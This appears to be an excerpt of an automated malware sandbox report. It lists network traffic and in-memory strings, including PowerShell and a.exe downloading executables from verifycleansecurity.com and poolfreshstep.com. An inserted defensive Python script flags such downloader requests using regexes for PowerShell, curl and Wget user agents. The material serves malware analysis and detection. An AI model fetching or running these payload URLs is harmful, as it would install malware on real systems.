    GET /crx/blobs/Ad_brx0SWGOSGqFl0dtZghwwCPrDWZ3EBf4bTFepBKfbm0QixONaZ1g0k0wb5urkIhgEf-wtTWoyXC7BIhwS0UXcksj8ndmGfZlI935Rq3ulUdBkR3PC7PNxnieVeoyyGwH8AMZSmuXQkx7tZmkTZwCQrcez-zYFuv5rwQ/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_25_2_3_0.crx HTTP/1.1
    Host: clients2.googleusercontent.com
    Connection: keep-alive
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic | HTTP traffic detected:
    GET /static/Qbffmsv.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682
    Host: verifycleansecurity.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /r/gsr1.crl HTTP/1.1
    Cache-Control: max-age = 3000
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
Source: global traffic | HTTP traffic detected:
    GET /r/r4.crl HTTP/1.1
    Cache-Control: max-age = 3000
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
Source: global traffic | HTTP traffic detected:
    GET /sfold/Kcjfkhnqcns.exe HTTP/1.1
    Host: poolfreshstep.com
    Connection: Keep-Alive
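Two of the HTTP requests above stand apart from the Chrome, CryptoAPI and CRL traffic: the fetch of /static/Qbffmsv.exe from verifycleansecurity.com carries a WindowsPowerShell/5.1.19041.1682 User-Agent and only three headers, and the fetch of /sfold/Kcjfkhnqcns.exe from poolfreshstep.com has no User-Agent at all. The block below is an added example, not part of the Joe Sandbox report, showing how a triage script can separate such downloader requests from browser noise on exactly those signals: an executable path, a scripting-host or absent User-Agent, and the absence of the Accept-Encoding, Accept-Language and Sec-Fetch-* headers every real browser sends. The sample requests are constructed transcriptions of three requests visible on this page, re-split into CRLF-separated header lines; the two-signal threshold and the header lists are the example's own choices.

```python
"""Triage HTTP requests from a sandbox run into browser noise vs. downloader candidates.

Added example (not the report's own tooling). SAMPLE_REQUESTS is constructed
from requests visible on the page, with headers split onto CRLF lines as they
would appear on the wire. Thresholds and header lists are the example's
assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input: one Chrome new-tab request and the two executable
# downloads from the report.
SAMPLE_REQUESTS = [
    "GET /async/ddljson?async=ntp:2 HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "Connection: keep-alive\r\n"
    "Sec-Fetch-Site: none\r\n"
    "Sec-Fetch-Mode: no-cors\r\n"
    "Sec-Fetch-Dest: empty\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36\r\n"
    "Accept-Encoding: gzip, deflate, br, zstd\r\n"
    "Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\n\r\n",
    "GET /static/Qbffmsv.exe HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) "
    "WindowsPowerShell/5.1.19041.1682\r\n"
    "Host: verifycleansecurity.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /sfold/Kcjfkhnqcns.exe HTTP/1.1\r\n"
    "Host: poolfreshstep.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
]


@dataclass
class Request:
    method: str
    path: str
    headers: dict                       # header names lower-cased
    reasons: list = field(default_factory=list)

    @property
    def host(self) -> str:
        return self.headers.get("host", "")


def parse_request(raw: str) -> Request:
    """Parse a raw HTTP/1.x request head into method, path and a header dict."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


# Signals. A real browser always sends the headers in BROWSER_HEADERS; the
# .NET/PowerShell WebClient stack identifies itself in the UA string.
EXEC_EXT = re.compile(r"\.(exe|dll|scr|ps1|bat|msi)(\?|$)", re.IGNORECASE)
SCRIPT_UA = re.compile(r"WindowsPowerShell|python-requests|curl/|Wget/", re.IGNORECASE)
BROWSER_HEADERS = {"accept-encoding", "accept-language", "sec-fetch-mode"}


def triage(req: Request) -> Request:
    """Attach a human-readable reason for every downloader signal present."""
    ua = req.headers.get("user-agent", "")
    if EXEC_EXT.search(req.path):
        req.reasons.append("executable download")
    if not ua:
        req.reasons.append("no User-Agent header")
    elif SCRIPT_UA.search(ua):
        req.reasons.append("scripting-host User-Agent")
    if BROWSER_HEADERS.isdisjoint(req.headers):
        req.reasons.append("missing browser headers")
    return req


def suspicious_hosts(raw_requests) -> dict:
    """Map host -> reasons for every request showing at least two signals.

    Requiring two signals keeps a lone CRL fetch by Microsoft-CryptoAPI (no
    browser headers, but no executable either) out of the result.
    """
    out = {}
    for raw in raw_requests:
        req = triage(parse_request(raw))
        if len(req.reasons) >= 2:
            out[req.host] = req.reasons
    return out


if __name__ == "__main__":
    for host, why in suspicious_hosts(SAMPLE_REQUESTS).items():
        print(f"{host}: {'; '.join(why)}")
```

Run against the three constructed requests, only verifycleansecurity.com and poolfreshstep.com are returned; the Google request trips none of the signals. When adapting this to a real capture, keep the executable-path signal last in priority: a download with a browser-looking User-Agent but no Accept-Language or Sec-Fetch-* headers is the more common evasion, and the header check catches it where the UA check does not.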
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000003.1387383379.00003D3C014D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1387428615.00003D3C01398000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) 
#logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1529975858.00003D3C017A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529975858.00003D3C017A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528655501.00003D3C013BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1528655501.00003D3C013BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlb equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: verifycleansecurity.com
Source: global traffic | DNS traffic detected: DNS query: fallback-01-static.com
Source: global traffic | DNS traffic detected: DNS query: 59.60.14.0.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic | DNS traffic detected: DNS query: apis.google.com
Source: global traffic | DNS traffic detected: DNS query: play.google.com
Source: global traffic | DNS traffic detected: DNS query: poolfreshstep.com
Source: global traffic | DNS traffic detected: DNS query: relay-01-static.com
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                      Source: chrome.exe, 0000000C.00000002.1521615709.00003D3C007C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
                      Source: powershell.exe, 00000001.00000002.1176038635.0000000007206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: chrome.exe, 0000000C.00000002.1524613309.00003D3C00BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
                      Source: chrome.exe, 0000000C.00000002.1527010971.00003D3C0109C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30ACD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: chrome.exe, 0000000C.00000003.1472799994.0000021F40DDD000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1514667978.0000021F40DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micr
                      Source: chrome.exe, 0000000C.00000002.1518059371.00003D3C0006B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                      Source: powershell.exe, 00000001.00000002.1173728731.0000000005788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000001.00000002.1170870168.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poolfreshstep.com
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poolfreshstep.com/sfold/Kcjfkhnqcns.exe
                      Source: chrome.exe, 0000000C.00000002.1519339651.00003D3C00304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
                      Source: powershell.exe, 00000001.00000002.1170870168.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1170870168.0000000004721000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000001.00000002.1170870168.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.000000000358D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003615000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://verifycleansecurity.com
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003221000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.00000000035FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://verifycleansecurity.com/static/Qbffmsv.exe
                      Source: a.exe, 0000000B.00000002.1787672422.0000000003583000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003598000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003546000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000356E000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000355A000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000358D000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003575000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000354C000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 00000001.00000002.1170870168.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: chrome.exe, 0000000C.00000002.1519339651.00003D3C00304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/update2/response
                      Source: chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                      Source: chrome.exe, 0000000F.00000000.1433368794.0000026406406000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
                      Source: chrome.exe, 0000000C.00000002.1527164269.00003D3C01100000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                      Source: chrome.exe, 0000000C.00000002.1518017811.00003D3C0004C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1532602280.00003D3C01AE4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                      Source: chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                      Source: chrome.exe, 0000000C.00000002.1518136270.00003D3C00096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
                      Source: chrome.exe, 0000000C.00000003.1424062885.00003D3C004B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1394323838.00003D3C014F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529975858.00003D3C017A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/:
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/J
                      Source: chrome.exe, 0000000C.00000002.1532032472.00003D3C01A70000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530801030.00003D3C018F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                      Source: chrome.exe, 0000000C.00000002.1529698334.00003D3C016F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&am
                      Source: chrome.exe, 0000000C.00000002.1529698334.00003D3C016F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&am;ogbl
                      Source: chrome.exe, 0000000C.00000002.1529698334.00003D3C016F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530801030.00003D3C018F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                      Source: chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultandler
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1523468073.00003D3C00A48000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524666430.00003D3C00BD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522696557.00003D3C00994000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525018522.00003D3C00C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522696557.00003D3C00994000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525018522.00003D3C00C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522696557.00003D3C00994000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525018522.00003D3C00C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
